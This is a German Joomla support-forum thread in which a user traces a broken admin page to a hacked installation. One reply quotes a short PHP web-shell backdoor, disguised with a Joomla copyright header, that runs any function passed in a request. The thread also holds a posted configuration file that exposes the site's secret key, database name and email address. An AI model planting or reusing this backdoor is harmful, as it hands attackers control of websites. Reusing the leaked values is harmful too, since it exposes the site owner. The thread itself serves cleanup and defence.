Im Backend „Konfiguration“ ohne Layout

hardy007 · 21. Januar 2016

Ich habe das Problem, dass im Backend die Seite „Konfiguration“ ohne Layout angezeigt wird (siehe Bild).

Meine Webseite: http://boeblinger-open.de
Provider: 1+1
[b]Joomla Version: 3.4.8
Backend Template: isis-default.

Das Problem trat vor einigen Wochen auf, ich weiß, nicht genau wann und was die Ursache war. Und es ist nur die eine Seite im Backend betroffen.

Ich habe keine neuen Erweiterungen installiert und in den letzten Wochen nur Beiträge erfasst, aber keine grundsätzlichen Änderungen an
der Konfiguration vorgenommen. Kann ja dort im Moment auch nicht speichern und die manuelle Anpassung der Werte über die configuration.php
habe ich nicht vorgenommen. SEO ist ganz normal konfiguriert, also in Joomla „Suchmaschinenfreundliche URLs = Ja“ und das war’s.
Ich glaube aber, ich habe mal zu Testzwecken Suchmaschinenfreundliche URLs auf „Nein“ gesetzt und dann wieder zurückgesetzt auf „Ja“.

Ich habe mir im Forum mehrere Stunden die Beiträge und sonstigen Informationen angeschaut, aber keine Lösung gefunden. Mir nicht klar,
was für die fehlende Einbindung der css-Dateien verantwortlich sein könnte.

Ich weiß vor allem nicht, wie ich den Fehler beheben kann. Denn die letzte funktionierende Sicherung mit Akeeba Backup (April 2015),
die ich nach meinem letzten Joomla-Update gemacht hatte, kann ich nicht mehr zurückspielen, da sonst die ganzen erfassten Beiträge und
Daten verloren sind, die ich in der Zwischenzeit gemacht habe.

Das ist die Lage. Hoffentlich sieht jemand eine Lösung. Vielen Dank schon mal im Voraus!

Bester Joomlaner · 21. Januar 2016

Eine nicht kompatible Erweiterung.

Backend - Erweiterungen - Verwalten - Verwalten - nach IDs sortieren - ab 10.000 alles gleichzeitig deaktivieren. Nutzt Du ein anderes Templates, solltest Du vorher auf ein Standard-Template umstellen.

Browser und Joomla Cache leeren - dann erneut schauen.

gue12 · 21. Januar 2016

Nehme einmal einen anderen Editor für Backend

hardy007 · 22. Januar 2016

So, habe jetzt die Tipps von Bester Joomlaner alle ausprobiert: höchste ID bei mir war 808. Habe alle nach und nach deaktiviert bis 600. Und das Template geändert auf ein Standard-Template. Aber leider alles ohne Wirkung.

gue12: Änderung des Editors hat auch nichts gebracht.

An was könnte das liegen? Gibt es vielleicht noch andere Vorschläge zur Behebung? Bin ziemlich ratlos...

Bester Joomlaner · 22. Januar 2016

Zitat von hardy007

Shöchste ID bei mir war 808.

Das bedeutet, dass Du keine einzige Erweiterung - also keine Komponente, keine Plugin, kein Template oder Modul installiet hast?

Die nachträglich installierten Erweiterungen fangen mit der ID 10.000 an.

hardy007 · 22. Januar 2016

Hallo Bester Joomlaner,
hier sind Screenshots der Erweiterungen, jeweils 1. und letzte Seite. Die IDs von 1 -808.

1.Seite:

2.Seite:

Ich hatte zuvor alles deaktiviert, das sich deaktivieren
lässt. Aber das Ergebnis war immer noch dasselbe.

Elwood · 22. Januar 2016

Zitat von hardy007

... Das Problem trat vor einigen Wochen auf ...

... Ich habe keine neuen Erweiterungen installiert ...

... Denn die letzte funktionierende Sicherung mit Akeeba Backup (April 2015),
die ich nach meinem letzten Joomla-Update gemacht hatte ...

Alles anzeigen

Da gab es aber die Version 3.4.8 noch nicht. Musst zwischen April und heute doch irgendwelche Updates gefahren haben?

Mal ein anderes BE- Template probiert?

anka · 22. Januar 2016

Die Erweiterungen, die auf der letzten Seite gelistet werden, sind alle hoffnungslos veraltet. Falls deine Seite noch nicht gehackt wurde, dann versuche es mal mit einem Update aller externen Erweiterungen (Chronoforms, ProFiles usw.). Aber Vorsicht: teilweise ist sogar ein Upgrade/Migration (z.B. Chronoforms) nötig. Auf jeden Fall solltest du vorher unbedingt ein komplettes Backup machen.

hardy007 · 23. Januar 2016

Elwood:
im April 2015 hatte ich die letzte Sicherung nach dem Update auf Joomla 3.4.1 gemacht.Der Fehler trat irgendwann im Lauf des Jahres auf.
Im Januar 2016 habe das Update auf die neueste Joomla-Version gemacht.

anka:
danke für deine Tipps. Ich habe sie alle durchgeführt. Hat aber nichts gebracht. Wahrscheinlich hast du Recht und die Seite ist gehackt worden.Ich gehe einfach mal davon aus und nehme es als gegeben hin.
Künftig werde ich natürlich alle nur möglichen Sicherheitsmaßnahmen treffen. Wie kann ich denn aber jetzt das Beste draus machen? Ich nehme an Neuinstallation. Ist dann seit der letzten Sicherung der gesamte Inhalt futsch oder ist noch irgendwas von den Beiträgen zu retten?

hardy007 · 23. Januar 2016

Nachtrag zu Elwood:
anderes BE- Template habe ich auch schon probiert.

Elwood · 23. Januar 2016

Zitat von hardy007

Elwood:
im April 2015 hatte ich die letzte Sicherung nach dem Update auf Joomla 3.4.1 gemacht.Der Fehler trat irgendwann im Lauf des Jahres auf.
Im Januar 2016 habe das Update auf die neueste Joomla-Version gemacht.

Da hast du 4 Bugfixpatches und 2 wichtige Sicherheitspatches verpasst.
Könnte dann naheliegend sein, dass deine Seite gehackt wurde.

Die letzten Beiträge könntest du z.B. per Copy and Paste in deine letzte Sicherung übertragen.

Dann würde ich den kompletten Webspace und die DB löschen vor einer Backup- oder Neuinstallation..

j!-n · 23. Januar 2016

Versuche mal, ein komplettes deutsches Sprachpaket zu installieren. Bekommst du auf www.jgerman.de.

Webworker Berlin · 23. Januar 2016

Entweder deine Chmods (Dateiberechtigungen) stimmen nicht = Ordentlich einstellen

Oder Datei/en sind beschädigt = Ein Joomlaoaket deiner Version ohne dem Verzeichnis Installation per FTP drüber laden und dabei auf Fehler achten

Falsche Werte in der configuration.php = Am besten mal hier posten ohne das Passwort

Eine eventuell vorhandene .htaccess im Administrator ? = mal testweise umbenennen.

Sprache mal umstellen auf engl fürs Backend, ausloggen und wieder einloggen.

Oder aber vielleicht doch gehackt.

hardy007 · 27. Januar 2016

So, jetzt bin ich mit allen Tipps durch!

j!-n:

Sprachpaket wurde installiert, Ergebnis: keine Änderung.

Webworker Berlin:

Chmods geprüft, Ordner = 755, Dateien 644.
htaccess nicht vorhanden
Sprache fürs Backend auf engl. umgestellt, ausgeloggt und wieder eingeloggt. Ergebnis: keine Änderung!
Joomlapaket meiner Version per FTP drüber geladen. Ergebnis: keine Änderung!

Also vielleicht doch gehackt!
Ich danke allen für ihre wertvollen Tipps und ihre Hilfe. Dann werde ich jetzt,
sofern nichts überraschendes mehr geschieht, den Fall als gelöst betrachten.

Hier zum Abschluss meine configuration.php:

Spoiler anzeigen

PHP

<?php
class JConfig { 
           public $MetaAuthor = '1'; 
           public $MetaDesc = ''; 
           public $MetaKeys = ''; 
           public $MetaRights = ''; 
           public $MetaTitle = '1'; 
           public $MetaVersion = '0'; 
           public $access = '1'; 
           public $cache_handler = 'file'; 
           public $cachetime = '15'; 
           public $caching = '0'; 
           public $captcha = '0'; 
           public $cookie_domain = ''; 
           public $cookie_path = ''; 
           public $db = 'db472901189';
            public $dbprefix = 'rg2u1_';
            public $dbtype = 'mysql';
            public $debug = '0'; 
           public $debug_lang = '0';
            public $display_offline_message = '2';
            public $editor = 'tinymce'; 
           public $error_reporting = 'default';
            public $feed_email = 'author'; 
           public $feed_limit = '10'; 
           public $force_ssl = '0'; 
           public $fromname = 'Böblinger Open'; 
           public $ftp_enable = '0'; 
           public $ftp_host = ''; 
           public $ftp_pass = ''; 
           public $ftp_port = '21';            
public $ftp_root = '';            
public $ftp_user = '';            
public $gzip = '0';            
public $helpurl = 'https://help.joomla.org/proxy/index.php?option=com_help&keyref=Help{major}{minor}:{keyref}';            
public $host = '*****';            
public $lifetime = '15';            
public $list_limit = '20';            
public $live_site = 'http://boeblinger-open.de/';            
public $log_path = '/homepages/26/d404012167/htdocs/bbopen-test/log';   
public $mailer = 'mail';            
public $mailfrom = 'ppo@polz.name';            
public $memcache_compress = '1';            
public $memcache_persist = '1';            
public $memcache_server_host = 'localhost';            
public $memcache_server_port = '11211';            
public $offline = '0';            
public $offline_image = '';            
public $offline_message = 'Diese Website ist zurzeit im Wartungsmodus.<br />Bitte später wiederkommen.';            
public $offset = 'UTC';            
public $offset_user = 'UTC';            
public $password = '*********';            
public $robots = '';            
public $secret = 'cbkyfPLHISSI3bihT1OqwUr9uaMFNLfa';            
public $sef = '1';            
public $sef_rewrite = '0';            
public $sef_suffix = '0';            
public $sendmail = '/usr/sbin/sendmail';            
public $session_handler = 'database';            
public $sitename = 'Böblinger Open';            
public $sitename_pagetitles = '1';            
public $smtpauth = '0';            
public $smtphost = 'localhost';            
public $smtppass = '';            
public $smtpport = '25';            
public $smtpsecure = 'none';            
public $smtpuser = '';            
public $tmp_path = '/homepages/26/d404012167/htdocs/bbopen-test/tmp';            
public $unicodeslugs = '0';            
public $user = '****';            
public $memcached_persist = '1';            
public $memcached_compress = '0';            
public $memcached_server_host = 'localhost';            
public $memcached_server_port = '11211';            
public $proxy_enable = '0';            
public $proxy_host = '';            
public $proxy_port = '';            
public $proxy_user = '';            
public $proxy_pass = '';            
public $mailonline = '1';            
public $session_memcache_server_host = 'localhost';            
public $session_memcache_server_port = '11211';            
public $session_memcached_server_host = 'localhost';            
public $session_memcached_server_port = '11211';            
public $frontediting = '1';            
public $asset_id = '1';            
public $redis_persist = '1';            
public $redis_server_host = 'localhost';            
public $redis_server_port = '6379';            
public $redis_server_auth = '';            
public $redis_server_db = '0';            
public $massmailoff = '0';}

Alles anzeigen

edit @Indigo66: Keine Zugangsdaten posten - für langen Code, Spoiler verwenden.

Webworker Berlin · 27. Januar 2016

Schau mal oben. Ich habe eine konversation/Pn aufgemacht. Teste das mal was ich da geschrieben habe.

kitepascal · 28. Januar 2016

Hi,

gehackt wurdest du in jedem Fall..

Schau mal in /libraries/joomla/database/driver
- 9 PHP Dateien liegen im Original drin.

Hatte da bei einer Seite mit gleichem Symptom eine 10. (bclass.php) drin.

PHP

<?php


/**
 * @package     Joomla.Platform
 * @subpackage  Database
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE
 */


@extract ($_REQUEST);
@die ($c($f));


?>

Alles anzeigen

Info

Nach Löschung ist das Layout wieder da.

hardy007 · 28. Januar 2016

Webworker Berlin:
Danke für deinen Tipp, er war leider ohne Erfolg!

kitepascal:
Unfasslich, aber wahr! Deine Vermutung war schlussendlich die Richtige!
Unter „/libraries/joomla/database/driver“ war tatsächlich eine 10.Datei vorhanden, mit demselben Namen „bclass.php“.
Und sie enthält auch genau den von dir angegebenen Code.
Auch der lapidare Satz von dir „Nach Löschung ist das Layout wieder da.“ war genau richtig. Nach Löschung der da nicht hin gehörenden 10.Datei „bclass.php“, war das Layout sofort wieder da!!

Da somit im Backend die „Konfiguration“ wieder mit Layout angezeigt wird, kann das Thema nun offiziell als erledigt markiert werden!

An alle vielen Dank für die bereitwillige und engagierte Hilfe. Ganz besonders aber an „kitepascal“, der mir eine Lehrstunde in Sachen „Hacking“ erteilt hat, für die ich dankbar bin und aus der ich für die Zukunft meine Lehre ziehen werde!

Chapeau an alle!!

j!-n · 29. Januar 2016

Es ist davon auszugehen, dass das nicht die einzige Schaddatei in der Installation war. Du solltest das noch einmal gründlich prüfen.

kitepascal · 29. Januar 2016

Genau, vorher hatte ich in meinem Fall noch einige andere Backdoors entfernt.

hardy007 · 3. Februar 2016

j!-n:
danke, genau das habe ich gemacht. Ich habe die Original Files der Joomla-Installation mit der gehackten Installation verglichen, sowie auch Original-Files der Erweiterungen.

kitepascal:
Dabei habe ich noch weitere Backdoors entdeckt. Jetzt ist alles bereinigt.

Nochmals Dank an alle!